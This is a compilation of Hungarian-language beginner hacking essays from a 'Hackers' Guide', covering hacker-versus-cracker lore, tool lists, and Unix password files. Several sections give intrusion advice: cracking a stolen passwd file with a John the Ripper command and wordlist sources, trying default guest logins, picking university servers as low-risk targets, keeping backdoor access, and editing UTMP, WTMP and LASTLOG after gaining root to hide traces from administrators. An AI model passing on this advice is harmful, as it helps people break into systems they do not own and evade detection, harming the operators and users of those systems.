egy ártatlan user ftp-zik illetve telnetezik a gépről loggolja az account usernevét és jelszavát. FIGYELEM! A HACKER SOHA(!) SEM RONGÁL!!! Az ilyen emberek, akik hackereknek hiszik magukat, általában más programjaival
39
Hackers’ Guide
hatolnak be és azokkal ,,megsebzik'' a gépet. Ilyet soha ne tégy! Ne felejtsd el, hogy az értelmes hacker általában text filet hagy maga után, amelybe leírja mit kell kijavítani, vagy milyen módon jutott be (lehet az /etc/motd fájlba is). A snifferek és a backdoorok nem rongálnak és általában nem okoznak bajt. Továbbá léteznek olyan hackerek, akik néha ártalmatlan, néha ártalmas vírusokat írnak és ezeket terjesztik. Nemrég volt rá példa a "Melissa" nevezetű vírus készítője, akit vagy 20 év börtönbüntetésre ítélhetnek, ha minden vádpontban bűnösnek találják. Az ilyenek sem igazi hackerek, bár annak néznek ki, végülis profi programozók. Ezek után említenék pár dolgot a Crackerről (nem HACKER, CRACKER!). A cracker általában egy elbúsult ember, aki nem találta meg a Neten a helyét. Soha ne keverjük össze a hackerrel! A cracker maximum amatőr programozó, de még talán az sem. Szóval a cracker mások által írt programokat használ, amelyeket nem ért, csak csupán használ. Hozzáteszem nem exploitokat! Ezeket kitanulja használni és ezzel elindul tesztelni, ha egyik nem megy az emberen neki, kipróbálja a másik progit. Az ilyen emberek azok, akik NetBust, BO-t, vagy ilyeneket használnak. A cracker sohasem tapasztalatból csinálja, amit csinál, hanem ösztönből. Én az ilyeneket semmibe veszem. Ők azért lettek ilyenek, mert nem sikerült befutni hackerként, ezért választották ezt a "munkát". Én elítélem őket. Ha be is jutnak egy szerverre, csak véletlen sikerült. Erről ennyit. Mit használ illetve nem használ egy hacker? Először is lejegyzem, nembaj, ha van olyan progid, amit nem használ, sose töröld le! Mindig hasznodra lehet. Használ/csinál/szükséges: •
"C" compiler
•
Telnet :)
•
FTP :)
•
Notepad :)
•
Exploitok (akár netről is lehet leszedni, vagy írni)
•
Minél több oktató jellegű dokumentum --> Mint ez :)
•
Mindig olvasni új fejlesztéseket!
•
Egy anonym email
•
Minél több hackelt shell (Taiwan, Deutsch, stb.)
•
Agy ("Use your brain and u have a good day :)" /Pac)
•
Víruskeresők, kódoló progik
Ezeket használja, csinálja, szükségesnek tartja egy hacker... Igazából nem tudom hova soroljam a John the Ripper nevezetű progit, amely az /etc/passwd filet pörgeti egy szótár segítségével, vagy önmagával (single crack mode). Az ilyen se kell, de nem baj, ha van. Ugyanis, ahogy egyszer Dudu barátom írta, ,,A passwd fájl törése nem hackelés''. Ezért nem írom még a tiltott holmikhoz :)
40
Hackers’ Guide
Most nézzük mit nem használ, mit nem kell használnija, mit nem érdemes: •
NetBus
•
BO, semmi trojan, semmi vírus
•
PortScanner (minek?)
•
Jack's password cracker
•
Nuke, DialUp killer
•
Spoofer, Flooder progik
Ezeket a progikat, amik ittvannak általában Crackerek használják. Semmi szükségünk rá. Amúgy van egy mondásom: ,,A Cracker hamarabb megfertőződik, mint áldozata'' Erről ennyit, és itt most abbahagyom. Ki egyetért, ki nem... --> tHIS fILE iS cREATED wITH nOTEPAD <-By: _____________ \ ____ ./ \ / / ./ \ [__/ / \ / ______ | /``` / / / / `` @ / / / ,,,,| I / /' | \ /___/ `.____\______\ Designed in Heaven Made in Paradise
[Aprócska megjegyzés: a cracker és a hacker szavak jelentését minden könyvben és cikkben másképp használják - tehát tulajdonképpen senki sem tudja, hogy valójában kik is ôk. :) A cracker mindenesetre többek között programokat tör, amihez nem árt asm-ben tudni, azaz nem mondhatni, hogy kezdô programozo lenne... - ViDe0, turpi]
************************************************************************************************
Első lépések… Tartalom 41
Hackers’ Guide
I. Gondolatok a Hackelesrol 1.0 - Bevezeto 1.1 - Hackerek, Phreakerek, Crackerek 1.2 - Mielott belekezdenel 1.3 - Pranoia II. Operacios rendszerek 2.0 - Windows 9x 2.1 - UNIX/Linux III. Passwd 3.0 - Szukseges programok 3.1 - A jelszofile (passwd) 3.2 - A jelszofile feltorese 3.3 - Utolso lepesek IV. Exploitok 4.0 - Mik azok az exploitok? I. Gondolatok a hackelesrol 1.0 - Bevezeto Az alabbiakban szeretnem mindenkivel megosztani azt amire egy kezdo hackernek szuksege van. Attol, hogy ezt elolvasod meg nem leszel hacker. Ez csak egy kis lokes lehet az utadon, ha a hackeles mellett dontesz. Mostanaban egyre gyakrabban hallani arrol, hogy komputerkalozok tortek be szuperszamitogepekbe, tinedzsert csiptek nyakon etc. Manapsag egy hackernek nagyon vigyaznia kell, jobban mint regen. A fejlett technika miatt a kopok egyre hatekonyabbak, a gepek okosabbak. Gondold at mielott belefogsz! 1.1 - Hackerek, Phreakerek, Crackerek Gyakori, hogy az emberek osszekeverik a hackereket, phreakereket es a crackereket. A hacker halozatokon keresztul szamitogepekbe tor be. Celja nem a rombolas, hanem az epites. Kutat a tudas utan. Minden egyes szamitogep egy kihivas, legyen az egy iskola szervere vagy egy NATO szuperszamitogep. Sokan sajnos rossz dolgokra hasznaljak a tudasukat. Szamitogeprendszereket tesznek tonkre mosolyogva egyetlen gombnyomassal, penzt, adatokat tulajdonitanak el. A phreakerek a telefonvonalak manipulalasaval foglalkoznak. Biztos sokan lattatok a Hackers cimu filmet es abban Phreak Phantom-ot az o kis magnetofonjaval :) A crackerek programokat tornek fel. Nem egyszer a program megjelenese utan par oraval (vagy epp meg a megjelenes elott) le lehet tolteni az internetrol a feltort verziot. Sokan elitelik amit csinalnak, de el kene gondolkodni mi lenne ha nem lennenek. Ki tudna megfizetni 10000 ft-ot egy jatekproggiert, vagy 300000-et komolyabb kepszerkesztoert...
42
Hackers’ Guide
1.2 - Mielott belekezdenel Nem art elgondolkodni arrol, miert akarunk hackelni. Ha elkapnak akkor kegyetlenul ra lehet pacsalni. Kirughatnak az iskoladbol, (ill. munkahelyedrol) megvan arra az esely, hogy SOHA nem talalsz olyan munkat ahol szamitogep kozeleben lehetsz (vagy dolgozhatsz). Legrosszabb esetben bortonbuntetes a "jutalom". Nagyon kell vigyazni mit teszel, hiszen konnyen lehetnek az elso betoreseid az utolsok... 1.3 - Paranoia Elso szamu szabaly: legy paranoias! Kodold az egesz vinyodat, ne beszelj arrol masnak, hogy epp min dolgozol...egyatalan senki ne tudjon rola hogy te mivel foglalkozol. Jegyzeteidet tarts a gepeden kodolva, papiron veletlenul se, kidobni pedig vegkepp ne dobd ki! Ezek kisse furan hangzanak de vegulis a bortonbuntetes is lehet vidam nemigaz?! :) II. Operacios rendszerek 1.0 - Windows 9x Az emberek legtobbje valoszinuleg windows valamely verziojat hasznalja. A kezdetekben ez eleg is azonban ha igazan komolyan akarsz foglalkozni a hackelessel valamilyen Linux/UNIX oprendszerre lesz szukseged. 2.0 - UNIX/Linux Az oprenszerek fellegvara. Csak azt nem tudsz megcsinalni vele amit nem akarsz. Legtobben a Linuxot hasznaljak mivel ingyenes. Nagyon stabil es biztonsagos. Es meg windows-os kezelofelulete is van! (X Windows) :) III. Passwd 3.0 - A szukseges programok A UNIX alapu rendszerekben talalhato egy passwd nevu file ami a kovetkezokepp nezhet ki: jane:GXkGUFA1NofyM:203:10:JaneBailey:/aa/widget/jane:bin/sh Felhasznaloi nev: jane Kodolt jelszo: GXkGUFA1NofyM Azonosito szam: 203 Csoportazonosito: 10 GCOS mezo: JaneBailey Home konyvtar: /aa/widget/jane Kezdeti shell: /bin/sh 3.2 - A jelszo file feltorese A login folyaman a megadott username es password utan a beutott pass osszehasonlitasra kerul a kodoltal es ha egyezik akkor beenged a rendszer. Azonban fel is torhetjuk a jelszot. Erre a legjobb megoldas valamilyen password cracker program hasznalata. Linux alatt a Crack, DOS/Win alatt a
43
Hackers’ Guide
John The Ripper a legjobb. Ezekhez meg szerenznunk kell egy dictionary filet ami azokat a loginokat/passokat tartalmazza amiket a cracker hasznalni fog. Egy pelda a John The Ripper hasznalatara: john.exe -w:dictionary.txt passwd Dictionary filet a www.hackersclub.com/km cimen talalsz vagy az ftp.ox.ac.uk-n. 3.3 - Utolso lepesek Ha sikerult megszereznunk a root jelszot es beleptunk a rendszerbe akkor kilepes elott el kell tuntetni magunk utan a nyomokat. Ezt a logfileok modositasaval tehetjuk meg. 3 filet kell modositani: UTMP, WTMP, LASTLOG Ezt vagy manualisan tesszuk meg vagy vmi program segitsegevel (pl zap2). Azonban ne toroljuk le oket, mivel igy a rendszergazda konnyen eszreveheti hogy bent jartunk a rendszerben. El kell gondolkodnunk mekkora az esely a lebukasra. Ha egy oktatasi intezmeny szerverebe tortunk be valoszinuleg nem kell aggodnunk hiszen nem valoszinu, hogy hogy a rendszergazda azzal fogja tolteni az idejet, hogy kinyomoztasson minket es az iskolak tobbsege nem igazan all ugy anyagilag, hogy kideritsek ki jart a rendszerben. Ilyen esetekben ildomos kuldeni egy levelet, hogy mikent jutottal be, hogy fixaljak ki a bugot stb. Biztos ami biztos en az anonymous level mellett voksolok. IV. Exploitok 4.0 - Mik azok az exploitok? Az exploitok olyan programok amelyek kihasznaljak egy rendszer hibajat, hogy azaltal root jogokat kaphass. Minden exploit mas, mindegyik mas resen keresztul aknazza ki a bugot. Nos ennyi lenne. Remelem mindent erhetoen fejtettem ki, laikusok szamara is erthetoen. Azt ajanlom ha igazi hacker akarsz lenni, olvass sokat aztan olvass meg tobbet es utana megtobbet es tobbet... Nehany hasznos link: News - www.rootshell.com Hackerz Hideout - www.hackersclub.com/km Thought on hack - www.extra.hu/hackerz Codemon hp-ja - www.extra.hu/CoDemon Hack adatbazis - www.neworder.box.sk CABLE BREAKERS - emperor.bdtf.hu/cb =====Cable Breakers=====================1999=========KerNel^Panic=============
************************************************************************************************
44
Hackers’ Guide
Ismertetô a hackelésrôl laikusoknak
Az itt leírtakat többnyire angol dokumentumok lefordítása után, a hasznos elemeket kiszûrve készítettem. Ez itt kizárólag ismertetô jellegû információ, a felhasználásáért semmilyen felelôséget nem vállalok, sôt az informatikai rombolást magam is elítélem!
Ezek a tanácsok nem isteni sugallatok, ajánlom azonban mindazoknak, akik szeretnék kipróbálni magukat, de nem tudják hogyan kezdjenek hozzá. Hasznos lehet azonban az óvatos, és tanulni vágyó kezdô rendszergazdáknak is. Megpróbálok mindent magyarázni, akinek esetleg ezek a dolgok a könyökén jönnek már ki attól elnézést kell hogy kérjek.
Amikor én eldöntöttem, hogy komolyabban szeretnék foglalkozni az imformatikával, egy idô múlva felmerült a hackerség kérdése. Elôször nem tudtam mit kezdeni az egész dologgal, hiszen nem tudtam hogy ez az egész hogyan is mûködik. Ebben szeretnek egy kis segítséget nyújtani, és segíteni eldönteni, hogy megéri-e nekik sok 100 vagy 1000 órát rászánni erre a kicsit különös, és nem is éppen veszélytelen idôtöltésre. Tudnunk kell mindenek elôtt, hogy /a köznyelvben használt, általános/ hackerség ILLEGÁLIS, és ezt nem csak az USAban veszik igen komolyan! Ugyanakkor az eredeti hackerség fogalma teljesen legális! /hacker jargont ajánlom mindenki figyelmébe, ahol többek között a pontos meghatározást is megtalálhatja/ 3 informatikai törvenysértô alapeset létezik /nagyvonalakban/: a hacker (=> halózatokon keresztül hatol be más rendszerekbe; az igazi hacker azonban nem tesz kárt bennük; fô célja az információ szerzés; nem feltétlenül jó programozó, jobban ért a hálózatok mélyének mûködéséhez), phreaker (=> egy különleges törvényen kívüli aki telefonhálózatok buherálására specializálódott), cracker (=> ô inkább programok feltörésével foglalkozik; jó programozó). A hármat rendszeresen keveri a köznyelv /fôleg a hackert és crackert/, sôtt, még néha saját maguk is rossszul tudják, hogy kicsodák. Visszatérve a lényegre természetesen akadnak mások is akik ebbe a kategóriába sorolhatóak, de most velük nem foglalkozok részletesen. Ha komolyan érdekel valakit a dolog, akkor sok olvasás után úgyis találkozni fog a többivel is. /itt újra felhívnám a figyelmet a hacker jargonra/
Aki azt várja, hogy most majd megtanul hackelni 15 perc alatt, az jobb, ha itt most abba is hagyja az olvasást. Ugyanis nemhogy 15 hónap alatt, de még 15 év alatt sem lehet megtanulni mindent, arról nem is beszélve, hogy ez csak egy rövid áttekintés, azoknak akik semmit még semmit sem tudnak ezekrôl a dolgokról. Amit én itt összeírtam ebben az egész dokumentumban, az körülbelül annyi amennyit 45
Hackers’ Guide
Amstrong láthatott a Földbôl, amikor Holdra lépett... lényegében csak egy benyomás... A hackerségrôl általában: Fontosnak tartom, hogy úgy általában is írjak a hackerségrôl, ne csak hogy hogyan is kell, meg legális-e vagy nem. A hackerség egy "életforma" vagy inkább "életérzés", nem is sejti az átlag, vagy akár egy informatikához értô ember, hogy valójában milyen komoly dolog is ez az egész, ennek saját kúltúrája és társadalma van. A nyelve eredetileg angol, de ami a hackereknek köznyelv, az egy átlag embernek érthetetlen szakzsargon /nálam is letölthetôek hackerek által használt szlengek és szakszavak szótárai/. Lehet kettôs életet élni, de nem igazán lehet kicsit hackernek lenni. Ha valaki ért hozzá akkor már hacker, mégha gyakorlatlan és amatôr is. Egy hacker óvatos, nem beszél nyíltan semmirôl, még a legközelebbi rokonainak sem; nem mondja el, hogy éppen min dolgozik, és mit ért el. A hackerek az interneten valójában semmilyen hétköznapi embertípushoz nem hasonlíthatóak. Közel állnak egy csapat szemüveges professzornak és egy összetartó vad utcai bandának az ötvözetéhez, akiknek fegyvere a mérhetetlen szaktudás.
Elöször lássuk, mire is lesz szükségünk a kezdetekhez! Fizikailag:
46
•
Computer. Tulajdonképpen a fajtája mindegy, mert minden platformra (=géptípus, mint: PC vagy Macintosh) megtalálhatóak a megfelelô programok. Az operációs rendszerrel (=a computert kezelô alap program, mint: Windows98, Windows95, MacOS, Unix, Linux) már komolyabban kell foglalkoznunk. Feltehetôleg a kezdôknek Windowsa van, esetleg MacOSe, ezzel sajnos nem fogunk tudni elérni sokmindent, de egyenlôre megfelel. Hozzáfûzöm, hogy nem kell elkeserednie annak, akinek nincs egy tizenszázezer megahertzes processzora, meg 3Dfx kártyája, meg 124Mega memoriája, ezek itt nem fognak hiányozni.(kivéve Brute Force feltöréseknel, ahol a gépünk "nyers erejét" fogjuk kihasznalni, hogy dekodoljunk egy jelszot peldául)
•
Modem.
•
Internet elérés. Sajnos saját, otthoni internet elérés nélkül nagyon nehéz dolgunk lesz, mert szinte minden információt innen fogunk begyûjteni.
•
IRC vagy egy segítôkész computeres haver. /ajánlott/ Az IRC egy valós idejû beszélgeôs rendszert jelent, amelyre rakapcsolódva mindig fogunk olyanokat találni akik tudnak nekünk segíteni. Valamint filekat is küldhetünk vele, ez néha jól is jön, ha a file fogadója történetesen egy fileok fogadására konfigurált, valamilyen szerveren tanyázó robot program. Ez a rendszer már önmagaban is megér egy hatalmas dokumentációt, a linkgyûjteményemben fogtok találni ezzel kapcsolatban egészen sok segítséget. Elôször is ajánlatos letölteni egy IRC kliens programot, mellyel hozzákapcsolódhatunk a
Hackers’ Guide
hálózathoz. /Windowson mIRC, Macintoshon IRCle, Unix/Linux bitchX amennyire én tudom/ •
Hálózati, illetve különbözô programozási nyelvekkel foglalkozó programok tömkelege, nyom-eltüntetôk, feltörô- és kódolóprogramok stb. No Comment... ezeket majd szép lassan be le7 gyûjteni, többnyire ingyenesek, és az internetrôll letölthetôek. /nálam a letölthetô szövegfilekba van sok ilyen beleírva, amelyet egy C fordítóval majd le lehet fordítani/ Szellemileg:
•
Sok-sok türelem. /ismétlem: SOK/
•
Unix/Linux operációs rendszer ismerete. Hackereknek elengedhetetlen, egyébként igen erôsen ajánlott. Más, komolyabb hálózati OPrendszerek ismeretére is szükségünk lesz, legalább felületesen. /pl.: WindowsNT/ Gondolom ez az elsô pont, ahol a legtöbb laikus lelkesedése kicsit alábbhagy. Erre azonban késôbb mindenképpen szükség lesz, elsajátítása magában is legalább egy fél év.
•
Programozási ismeretek. Crackereknek elengedhetetlen, de másoknak is szintén szüksége lesz rá, nehezen tudjuk kikerülni, legalább egy nyelvet kell ismernünk, hogy valamelyest megértsük az egész computeres világ mûködését. Legjobb ha a C nyelvet ismerjük, mert minden komolyabb helyzetben ezt használja mindenki, de kezdôknek ez irtó bonyolult lesz, ezért ezzel kezdeni nem ajánlatos.
•
Hálózatok mûködésének ismerete. Hackereknek elengedhetetlen.
•
Sok jó webes link. Ez fontos a gyors értesüléshez, és hogy anyagot és programokat találjunk segítségül. Sok hasznos link található nálam is, de jobb híján egy keresô siteon (linkgyûjteményemben is találsz ilyen keresô címet) lehet keresni ilyeneket.
•
Angol nyelv. Hát igen... magyar nyelven nem kaphatunk túl sok segítséget, az interneten pedig szinte minden angolul van.
Az itt felsoroltak második csoportja nélkül is elindulhatunk, de túl sokáig nem fogunk eljutni. A hackelésnek/crackelésnek ugyanis éppen az a lényege, hogy ezeket megismerjuk, és megtaláljuk gyengéit, majd megtanuljuk azokat érdekeinknek megfelelôen kihasználni. Elôször különbözô ágazatok felületes megismerését ajánlom, majd amely szimpatikus, abban az irányban továbblépni. Ebben segítséget nyújt majd az internet, és a magyar nyelven is kapható szakkönyvek. A különbözô rendszerek, programozási nyelvek és hálózatok tanulása -és NEM megtanulása- egyenként is egy, esetleg fél év, még akkor is ha minden héten szánunk rá néhány órát. Ekkor érjük el kb. azt a szintet amellyel már elkezdhetünk direkt hackeléssel/crackeléssel foglalkozó szövegeket olvasni. Valószínüleg most sokan abbahagyják az olvasást és kiábrándultan továbbszörföznek a WEBen. Igen... igazuk lehet?!
47
Hackers’ Guide
Most röviden leírok egy egyszerûbb módszert, (leegyszerüsítve) a sok közül Nem túl bonyolult: valahonnan szerezzünk vagy töltsünk le egy telnetezésre alkalmas programot. Ezt esetleg megtehetjük egyes program gyûjteményekbôl a weben, de a legjobb ha pl. irc-n kérünk valakitôl. /ilyen gyûjteményt találhattok a linkjeim között is/ Ha már fel tudunk kapcsolódni az internetre és minden be van állítva, akkor elindíthatjuk a szerzett programot. Keressünk, kérjünk vagy szerezzünk valahonnan egy szerver címet, majd kapcsolódjunk hozzá. /pl: 1.123.187.65, ez az IP cím, valami ilyesmit keressünk/ Sajnos minden telnet program másként néz ki, ezért a mûködését és kezelését már nem tudom elmagyarázni. Az egész procedúra lényege, hogy hozzákapcsolódunk egy speciális hálózati operációs rendszerû szerverhez (=> ilyen gépekrôl jön többek között a weboldalak tartalma, a letölthetô filek és egyáltalán minden adat, információ amelyet távolról kapunk meg), amelynek tulajdonképpen megkapjuk egy ablakba a kezelô felületét, vagyis bizonyos értelemben azt a képet amit akkor látnánk, ha ott ülnénk helyben a gép elôtt. Ezt talán ahhoz tudnám hasonlítani, amikor Windows95 alatt megnyitunk egy MS-DOS ablakot és oda írjuk be a parancsokat. Természetesen ezeken a gépeken olyan rendszer van mint például a UNIX, amely biztosítja, hogy ismeretlenek semmit se tudjanak kezdeni géppel, és az átlag felhasználók se tudjanak kárt tenni magában a rendszerben, legfeljebb csak saját dokumentumaikban és programjaikban. Ez egész egyszerûen úgy van megoldva, hogy az átlag felhasználó nem is látja a rendszer belsô felépítését és programszerkezetét, csak a számára engedélyezett részeket olvashatja/írhatja/futtathatja. Egy hacker dolga egy ilyen rendszert feltörni, tehát megszerezni magának valamilyen módon a jogosultságot az egész rendszer irányítására.... Itt kezdôdik az a pont ahol már csak az irdatlan hosszúságú,és nem igazán könnyen érthetô angol hacker fileok olvasásával megyünk valamire. Bennük tanácsot és ötletet kaphatunk. Természetesen ez azért nem ennyire egyszerû... konkrét eseteknél csak a frissebb anyagokkal megyünk valamire, mert a régiek olyan hiányosságokat és kiskpukat használtak ki a programokban, amelyeket azóta valószínüleg már rég kiküszöböltek.Fontos, hogy inkább elôször olvassunk inkább és tudjunk meg mindent amit lehet. Állami gépeket nagy ívben kerüljük el, viszonylag veszélytelenebb célpontok elsô nekifutásra az egyetemi és kollégiumi szervrek. Elôször eddig tartott a szöveg, de gondoltam ezt talán már sokan azelôtt is tudták, mielôtt idejöttek, ezért még a történet egyik lehetséges befejezését is leírom. Szükségünk van még egy névre és egy jelszóra, amivel legalább átlag felhasználókent bejuthatunk a szerverre. Sok helyen például ilyesmi: név: guest, user... jelszó (esetleg semmi): guest, user, demo... de jobb ha valakit megkérünk, hogy mondjon ilyet nekünk, vagy crackelünk egyet... bár ez még hátrébb van.
48
Hackers’ Guide
Léteznek, és sok helyen letölthetôek úgynevezett EXPLOIT programok, amelyek különösen nagy segítséget jelentenek néha. Mûködésük megértéséhez egy kis Unix ismeret is szükséges. A Unixban minden filenál megvan határozva, hogy a felhasználok mely csoportjának van olyan jogosultsága, hogy azt a filet olvashatja, írhatja és módosíthatja. Konkrétan ez úgy néz ki, hogy /mindenki tartozik a file szemponjából valamilyen csoporthoz/ a file létrejöttekor be kell állítani, hogy a file tulajdonosának, a vele egy csoportban lévôknek és az összes többieknek mire adunk engedélyt a fileal kapcsolatban. Van egy olyan speciális funkció, hogy amíg a filét mondjuk egy bármilyen személy futtatja /természetesen ha van erre jogosultsága/ akkor olyan jogosultságokat kap a rendszeren belül, mint a file tulajdonosa. Erre gyakran szükség van, amennyiben ez komolabban érdekel valakit, az máris mehet a könyvesboltba egy Unix könyvért. Visszatérve a tárgyhoz, ez akkor lehet hasznos egy hackernek, ha a file történetesen egy a rendszergazda (=root) tulajdonában álló file. Mint tudjuk a rendszergazdának korlátlan joga van az egész rendszer módosítására, tehát ha a filet futtatás közben sikerül megállítanunk, akkor az azt jelenti, hogy mi megkapjuk a root jogait és így a teljhatalmat is a rendszer fölött. Az Exploitok abban segítenek, hogy egy hibásan megírt programot megállítanak, és így megkímélnek minket minden komoly munkától. Ha egy renszeresen használt programban hibát talál valaki, és ez a valaki monjuk éppen egy cracker, akkor gyakran megírja hozzá az Exploitot és az pillanatok alatt elterjed az egész világon. Persze erre válaszul a program készítôi gyorsan kijavítják a hibát, és a magukra valamit is adó rendszergazdák például megszerzik a hiba kijavítását elvégzô programot. Ha sikerült mindez, akkor következik a mesterkedésünk nyomainak eltakarítása, ami megint csak egy külön tudomány... Hát... ennyire futotta így most hirtelen... Remélem most ez is segített!
Eredeti: CoDemon - H3XR00T http://hexnet.hpage. net/
************************************************************************************************
Kik a hackerek
49
Hackers’ Guide
FIGYELEM! A HACKERKEDEST VILAGSZERTE BUNTETIK!!! AMENNYIBEN TE TAVOL KIVANOD TARTANI MAGAD AZ ILYEN JELLEGU DOLGOKTOL, KERLEK NYOMD MEG AZ ESC-ET, TOROLD LE EZT ES AZ EHHEZ HASONLO DOLGOKAT A GEPEDROL, ES FELEJTSD EL, HOGY EZEKET HOL LEHET MEGTALALNI! AMENNYIBEN UGY DONTESZ, HOGY TOVABBOLVASOD, EL KELL FOGADNOD,HOGY A FELELOSSEG KIZAROLAG A TIED! TARTALOM Bevezeto Kik a Hackerek? Milyen egy igazi Hacker? Hackerek alaptorvenyei Hogyan is vagjunk neki? Vegszo Par szot a csapatrol
Bevezeto Hali mindenkinek! Ennek a filenak az a celja, hogy kezdo hackerpalantaknak segitseget nyujtsunk, segitsuk oket elinditani ezen a nehez uton. Bizonyara felmerul a kerdes, hogy miert eppen magyarul irom, miert nem angolul, es ha mar magyarul irom, akkor miert nem ekezetekkel. A valasz egyszeru. Mivel mi magyarok vagyunk, ezert magyarul jobban tudunk, es a kezdo magyar nyelvu hackerek pedig jobban megertik, mint a hasonlo temaban irodott angolnyelvu szovegeket. Az ekezet pedig egy olyan dolog, hogy ha en most ekezettel irnam, akkor a kulonfele gepeken kulonbozo kepp jelenne meg, es eleg zavaro tud lenni az ekezetek helyett a sok kriksz-kraksz. Kik a hackerek? A szo egyik jelentese: csakany. Az elso hackerek a szamitogep elterjedese utan szulettek meg, igaz akkor meg mast jelentett hackernek lenni. A kezdeti idokben a szamitogepek qrva nagyok voltak, kicsi memoriaval, es nuku wincsi. Ekkor a programozoknak meg erdekuk volt, hogy minel kisebbre irjak meg a programokat, mert a lemez es a memoria merete veges volt. Az eszes diakok arra torekedtek, hogy a kesz programokat minel jobban lefaragjak, minel kisebb legyen a program, es ugyanazt tudja. Ehhez nem kis programozasi tudas kellett. Tehat ok az osok. Buszkek lehetunk rajuk! Ma mar persze a halozatok birodalmaban van a Hackerek hazaja. Roviden: A hacker az, aki a halozatokba betor, helyben, vagy interneten keresztul. A hackereket persze tobb csoportba lehet osztani, tevekenyseguktol fuggoen. Vannak akik sajat maguk irnak progikat a feltoreshez, vannak akik a masok altal megirt, kozzetett programokkal dolgoznak, de a tobbseg vegyes osszetetelu, irnak is, maset is hasznaljak. A fontosabb kulonbseg a hackerek kozott az, hogy miert csinaljak az egeszet.
50
Hackers’ Guide
- ElitHacker - Hacker Ok azok, akik azert tornek be valahova, mert elvezik. Megis mi az, ami miatt csinaljak? Az erzes miatt. Amiatt, hogy XY helyre sikerult betorni. Mert ahhoz, hogy az ember valahova betorjon, programokra, technikara, logikara, ugyessegre van szukseg. Nem kis nehezseg megcsinalni ugy, hogy nehogy elcsipjek oket. Kockazatos jatek, ahol neha a gyors dontesen mulik minden. Ki kell jatszani a rendszer vedelmet (akarcsak a fociban a csatarnak a vedelmet). Ez korulbelul olyan erzes, mint egy nagyon biztonsagos bortonbol megszokni. Bennuk van a virtus. "Azert is megcsinaljuk!" -Jerk, vagy mas neven a Hackerek vandalja. Ok olyanok mint az igazi vandalok, csak rombolnak ertelem nelkul, ebben lelik oromuket. (Ez a tipus kihalofelben van, ha mar ki nem halt...) A hackerek kozott vannak olyanok, akik bankokba tornek be, penzt lopnak, az eszukkel. Ez nem tul jellemzo a hackerek tarsadalmaban. A tobbseg ha valahova betort, akkor: - Esetleg biztositja, hogy maskor is be tudjon jonni. - Esetleg ha jo progik vannak a serveren, elmenti maganak. - Esetleg ha jo progik vannak a serveren, akkor masok szamara is hozzaferhetove teszi, vagy a lementett progikat valahol kozzeteszi a neten. - Esetleg a serveren hagy vmilyen szovegfilet, amiben leirja, hol van res a rendszerben, hol tudott bejonni. (Oket szeretik a rendszergazdak!) - Penzert karbantartja a servert, igy o is es a rendszergazda is jol jar. - Stb. Milyen egy igazi hacker? 1. Intelligens 2. Mindent akar tudni, mindenre kivancsi 3. Nem tul rossz tanulo a suliban, mivel a hackeleshez kell a logika es esz 4. Nem rombol szandekosan egy rendszerben, ahova betort 5. Az igazi hacker mindig kepzi magat, hogy jobb legyen 6. Igyekszik a legujabb technologiat elsajatitani 7. Nyugodtak, megbizhatok 8. Paranoias 9. Tud angolul, esetleg nemetul is 10. Programozik ASM-ben vagy C-ben, es meg egy masik programnyelvben is Hackerek alaptorvenyei
51
Hackers’ Guide
1. Ne semmisitsd meg a feltort operacios rendszert, ne tegyel benne kart, ha nem muszaj! 2. Ne feledkezz meg letorolni azokat a filekat, amik veszelyeztetik a menekulesedet, amik alapjan azonosithatnak, vagy amikbol esetleg rajohetnek, hogy hogyan jutottal be a rendszerbe! 3. Sehol ne hagyd meg a valodi neved, telefonszamod, vagy olyat, ami alapjan konnyen elkaphatnak! 4. Vigyazz, kinek mit mondasz magadrol! Ilyen temarol lehetoleg NE telefonon vagy zsufolt helyen beszelgessetek! Ne adj lehetoseget annak, hogy zsarolni tudjanak! 5. Akit meg nem ismersz igazan, annak ne add meg a valodi telefonszamodat! 6. Allami es gazdasagi szerverekre ne torj be, csak ha nagyon profi vagy, ugyanis ezek vannak a legjobb vedelemmel ellatva! Kezdj inkabb eloszor kisebb cegekkel! 7. Legy paranoias! Mivel a te tevekenyseged torvenyserto, ezert mindig resen kell lenned! Kodold azokat a filejaidat, amik esetleg bizonyitekul szolgalhatnak ellened! Az ilyen temaju jegyzeteidet, cimeidet tartsd hozzaferhetetlen, nehezen elerheto helyen! 8. Levelben ne irj a tevekenysegedrol, Emailben lehetoleg csak PGP-vel irj ilyen temarol, IRC-n pedig egyedul a DCC CHAT-ben bizhatsz meg, jelen pillanatban egyedul az nem kovetheto nyomon, hogy ott mirol beszelgettek. 9. Nem szegyen masoktol tanulni! Sot! A jovod mulhat egy-egy jo tanacstol, altalad ismeretlen technikatol, fortelytol! EZERT: NYUGODTAN KERDEZZ, ES TANULJ MAS HACKEREKTOL! De ez viszont is igaz, ha toled kernek segitseget, te is segits masoknak! 10. Igyekezz minnel tobbet tanulni, minel tobb filet elolvasni azokbol, amit a vilagszerte elo hackerek irtak, mert mindig lehet ujat tanulni! Addig ne kezdj bele, amig nagyobb ismeretet el nem sajatitasz ezen a teren, mert kulonben konnyen racs moge kerulhetsz, vagy fizetheted a birsagot, ezzel egyidejuleg pedig konnyen kirakhatnak a sulibol, munkahelyedrol! 11. Ne becsuld ala a rendszer es a rendszergazda kepesseget, legy ovatos! 12. Olyan helyre, ahol tudod hogy varnak rad, vagy a hackerek tamadasara, NE PROBALJ MEG BETORNI!!!!!! Ezzel mar tobben megjartak vilagszerte. 13. Ha betortel valahova, es mindenkepp hagyni akarsz valami azonositot a csapatodrol, vagy magadrol, akkor lehetoleg gondold vegig, hogy ha egyszer valamikor elkapnak, akkor azok alapjan mar gyerekjatek lesz megmondani, hogy hova tortel be te! Meg le se tagadhatod, mivel ott hagyod a csapatod, vagy sajat kezjegyedet.
52
Hackers’ Guide
